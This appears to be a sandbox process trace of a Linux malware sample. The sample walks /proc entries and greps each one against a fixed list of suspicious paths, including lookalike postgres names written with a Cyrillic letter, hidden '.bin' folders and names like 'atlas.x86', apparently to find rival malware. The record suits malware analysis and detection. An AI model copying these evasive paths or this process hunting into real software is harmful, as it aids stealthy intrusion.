/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1281
-
-
/bin/lsls -latrh /proc/fb4⤵PID:1284
-
-
/bin/grepgrep exe4⤵PID:1288
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1291
-
-
/bin/grepgrep exe4⤵PID:1295
-
-
/bin/lsls -latrh /proc/filesystems4⤵PID:1294
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1298
-
-
/bin/grepgrep exe4⤵PID:1301
-
-
/bin/lsls -latrh /proc/fs4⤵PID:1300
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1304
-
-
/bin/grepgrep exe4⤵PID:1308
-
-
/bin/lsls -latrh /proc/interrupts4⤵PID:1307
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1310
-
-
/bin/grepgrep exe4⤵PID:1314
-
-
/bin/lsls -latrh /proc/iomem4⤵PID:1313
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1317
-
-
/bin/grepgrep exe4⤵PID:1321
-
-
/bin/lsls -latrh /proc/ioports4⤵PID:1320
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1324
-
-
/bin/grepgrep exe4⤵PID:1327
-
-
/bin/lsls -latrh /proc/irq4⤵PID:1326
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1330
-
-
/bin/grepgrep exe4⤵PID:1334
-
-
/bin/lsls -latrh /proc/kallsyms4⤵PID:1333
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1336
-
-
/bin/grepgrep exe4⤵PID:1340
-
-
/bin/lsls -latrh /proc/kcore4⤵PID:1339
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1343
-
-
/bin/grepgrep exe4⤵PID:1346
-
-
/bin/lsls -latrh /proc/keys4⤵PID:1345
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1348
-
-
/bin/grepgrep exe4⤵PID:1351
-
-
/bin/lsls -latrh /proc/key-users4⤵PID:1350
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1353
-
-
/bin/grepgrep exe4⤵PID:1356
-
-
/bin/lsls -latrh /proc/kmsg4⤵PID:1355
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1358
-
-
/bin/grepgrep exe4⤵PID:1361
-
-
/bin/lsls -latrh /proc/kpagecgroup4⤵PID:1360
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1363
-
-
/bin/grepgrep exe4⤵PID:1366
-
-
/bin/lsls -latrh /proc/kpagecount4⤵PID:1365
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1368
-
-
/bin/grepgrep exe4⤵PID:1371
-
-
/bin/lsls -latrh /proc/kpageflags4⤵PID:1370
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1373
-
-
/bin/grepgrep exe4⤵PID:1376
-
-
/bin/lsls -latrh /proc/loadavg4⤵PID:1375
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1378
-
-
/bin/grepgrep exe4⤵PID:1381
-
-
/bin/lsls -latrh /proc/locks4⤵PID:1380
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1383
-
-
/bin/grepgrep exe4⤵PID:1386
-
-
/bin/lsls -latrh /proc/meminfo4⤵PID:1385
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1388
-
-
/bin/grepgrep exe4⤵PID:1391
-
-
/bin/lsls -latrh /proc/misc4⤵PID:1390
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1393
-
-
/bin/grepgrep exe4⤵PID:1396
-
-
/bin/lsls -latrh /proc/modules4⤵PID:1395
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1398
-
-
/bin/grepgrep exe4⤵PID:1401
-
-
/bin/lsls -latrh /proc/mounts4⤵PID:1400
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1403
-
-
/bin/grepgrep exe4⤵PID:1406
-
-
/bin/lsls -latrh /proc/net4⤵PID:1405
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1408
-
-
/bin/grepgrep exe4⤵PID:1411
-
-
/bin/lsls -latrh /proc/pagetypeinfo4⤵PID:1410
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1413
-
-
/bin/grepgrep exe4⤵PID:1416
-
-
/bin/lsls -latrh /proc/partitions4⤵PID:1415
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1418
-
-
/bin/grepgrep exe4⤵PID:1421
-
-
/bin/lsls -latrh /proc/sched_debug4⤵PID:1420
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1423
-
-
/bin/grepgrep exe4⤵PID:1426
-
-
/bin/lsls -latrh /proc/schedstat4⤵PID:1425
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1428
-
-
/bin/grepgrep exe4⤵PID:1431
-
-
/bin/lsls -latrh /proc/self4⤵PID:1430
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1433
-
-
/bin/grepgrep exe4⤵PID:1436
-
-
/bin/lsls -latrh /proc/slabinfo4⤵PID:1435
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1438
-
-
/bin/grepgrep exe4⤵PID:1441
-
-
/bin/lsls -latrh /proc/softirqs4⤵PID:1440
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1443
-
-
/bin/grepgrep exe4⤵PID:1446
-
-
/bin/lsls -latrh /proc/stat4⤵PID:1445
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1448
-
-
/bin/grepgrep exe4⤵PID:1451
-
-
/bin/lsls -latrh /proc/swaps4⤵PID:1450
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1453
-
-
/bin/grepgrep exe4⤵PID:1456
-
-
/bin/lsls -latrh /proc/sys4⤵PID:1455
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1458
-
-
/bin/grepgrep exe4⤵PID:1461
-
-
/bin/lsls -latrh /proc/sysrq-trigger4⤵PID:1460
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1463
-
-
/bin/grepgrep exe4⤵PID:1466
-
-
/bin/lsls -latrh /proc/sysvipc4⤵
- System Network Configuration Discovery
PID:1465
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1468
-
-
/bin/grepgrep exe4⤵PID:1471
-
-
/bin/lsls -latrh /proc/thread-self4⤵PID:1470
-
-
